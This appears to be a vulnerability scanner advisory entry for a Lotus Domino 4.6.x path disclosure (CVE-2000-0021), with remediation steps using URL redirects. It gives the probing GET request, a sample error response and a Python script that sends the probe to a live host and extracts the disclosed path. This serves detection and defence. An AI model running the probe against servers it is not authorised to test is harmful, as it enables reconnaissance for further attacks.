| VID |
22155 |
| Severity |
20 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
WWW |
| Detailed Description |
The Lotus Domino web server discloses its installation path when a request is made for a non-existent script under /cgi-bin. Lotus Domino Server is an application framework for web-based collaborative software that runs on multiple platforms, including Windows and UNIX. By default the virtual path /cgi-bin is mapped to the \domino\cgi-bin directory beneath the Notes data directory. Among the weaknesses in its handling of CGI requests is a path disclosure that lets a remote attacker learn the real filesystem path of the server. When a remote attacker requests a non-existent script in the /cgi-bin directory, for example:
GET /cgi-bin/non_existent_file HTTP/1.0
the Domino server returns an error message that includes the real path of the server, as in the following (response abbreviated):
HTTP/1.1 500 Bad script request -- no variation is executable
Server: Lotus-Domino/0
.....
Error 500 Bad script request -- no variation of 'c:/notes/data/domino/cgi-bin/non_existent_file' is executable
The quoted path tells a remote attacker significant facts about the system, such as the operating system and the layout of the file system (in the example above, a Windows host with the Notes data directory at c:/notes/data). This information can be used to formulate further attacks.
* Platforms Affected: Lotus Domino HTTP 4.6.x
* References: http://online.securityfocus.com/bid/881 http://www.iss.net/security_center/static/4389.php |
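The following check is an added example, not part of this entry or of any Lotus/IBM tool. It builds the probe request described above (using a random file name so that no real script can match), parses the HTTP response, and extracts the disclosed path from the "no variation of '...' is executable" error text. The sample response is constructed from the excerpt above and is not a real capture; the host name and the helper names are assumptions.

```python
"""
Check for the Lotus Domino /cgi-bin path disclosure (CVE-2000-0021, BID 881).

The probe is GET /cgi-bin/<random non-existent name>; a vulnerable server
answers 500 and quotes the absolute on-disk path of the missing script.
"""
import re
import secrets
import socket

# Domino's error text quotes the absolute path of the CGI it failed to find.
PATH_RE = re.compile(r"no variation of '([^']+)' is executable", re.IGNORECASE)


def build_probe(host, cgi_url_path="/cgi-bin"):
    """Return (probe_file_name, raw HTTP/1.0 request) for a non-existent CGI."""
    name = "nx_" + secrets.token_hex(4) + ".cgi"   # random, so no real script matches
    request = f"GET {cgi_url_path}/{name} HTTP/1.0\r\nHost: {host}\r\n\r\n"
    return name, request


def parse_response(raw: bytes):
    """Return (status_code, Server header or None, revealed path or None)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    server = None
    for header in lines[1:]:
        if header.lower().startswith("server:"):
            server = header.split(":", 1)[1].strip()
    match = PATH_RE.search(body.decode("latin-1"))
    return status, server, (match.group(1) if match else None)


def analyse(probe_name, raw: bytes):
    """Decide whether the response discloses a path and what it tells us."""
    status, server, revealed = parse_response(raw)
    if revealed is None:
        return {"vulnerable": False, "status": status, "server": server}
    # Strip the probe file name to recover the CGI directory itself.
    cgi_dir = revealed[:-len(probe_name)] if revealed.endswith(probe_name) else revealed
    if re.match(r"^[A-Za-z]:[/\\]", cgi_dir):
        os_hint = "windows"          # drive letter, e.g. c:/notes/data/...
    elif cgi_dir.startswith("/"):
        os_hint = "unix"
    else:
        os_hint = "unknown"
    return {
        "vulnerable": True,
        "status": status,
        "server": server,
        "revealed_path": revealed,
        "cgi_dir": cgi_dir,
        "os_hint": os_hint,
    }


def probe(host, port=80, timeout=5.0):
    """Send the probe to a live host (not exercised offline) and analyse the reply."""
    name, request = build_probe(host)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode("ascii"))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return analyse(name, b"".join(chunks))


# Constructed sample response modelled on the advisory excerpt (not a real capture).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 500 Bad script request -- no variation is executable\r\n"
    b"Server: Lotus-Domino/0\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>Error 500 Bad script request -- no variation of "
    b"'c:/notes/data/domino/cgi-bin/nx_deadbeef.cgi' is executable</body></html>\r\n"
)

# Constructed response from a server that does not disclose the path.
SAMPLE_CLEAN_RESPONSE = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Server: Lotus-Domino\r\n"
    b"\r\n"
    b"<html><body>Error 404 File not found</body></html>\r\n"
)

if __name__ == "__main__":
    print(analyse("nx_deadbeef.cgi", SAMPLE_RESPONSE))
    print(analyse("nx_deadbeef.cgi", SAMPLE_CLEAN_RESPONSE))
```

Against a live server, `probe("domino.example.test")` (assumed host name) performs the same request; the random file name matters because a request for a script that does exist would execute it rather than trigger the error.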
| Recommendation |
Since any request for a non-existent CGI triggers this error, the workaround is to create URL redirection documents in the DOMCFG.NSF database (the Domino Web Server Configuration database) so that anomalous CGI requests are redirected to another URL instead of being passed to the CGI handler. Two setups are suggested, depending on whether CGIs are needed.
* If the customer does not require any CGIs, the entire /cgi-bin directory can be redirected to another URL (a Notes database or an HTML file). Any "/cgi-bin" request is then sent to that URL and is never processed as a CGI.
* If the customer does require CGIs, the following setup is required:
1) In the HTTP section of the Server Document, change the "CGI URL path" field to a different URL path. The "CGI directory" field does not need to change, so the location of the CGI scripts on disk stays the same; only the URL that invokes them is altered.
Example: The default CGI URL path is "/cgi-bin"; change this to "/scripts/cgi-bin". After this change a request to /cgi-bin is treated as an ordinary URL rather than as a CGI invocation.
2) Create a URL Redirect document in DOMCFG.NSF for each specific CGI that resides on the server. Specify the incoming URL path as "/cgi-bin" and the redirection URL as "/scripts/cgi-bin".
Example: A customer has a CGI named "Xrun.cgi" in the domino/cgi-bin directory. Normally a request to run it arrives as "http://hostname/cgi-bin/Xrun.cgi". This request is redirected to "http://hostname/scripts/cgi-bin/Xrun.cgi", which Domino recognizes as a CGI and runs. The "/cgi-bin" URL itself is no longer treated as a CGI request; only the redirection to "/scripts/cgi-bin" causes the Domino server to process it as a CGI script. Requests for scripts that do not exist under "/cgi-bin" have no matching redirect and therefore never reach the CGI handler that produces the error. |
| Related URL |
CVE-2000-0021 (CVE) |
| Related URL |
http://online.securityfocus.com/bid/881 (SecurityFocus) |
| Related URL |
http://www.iss.net/security_center/static/4389.php (ISS) |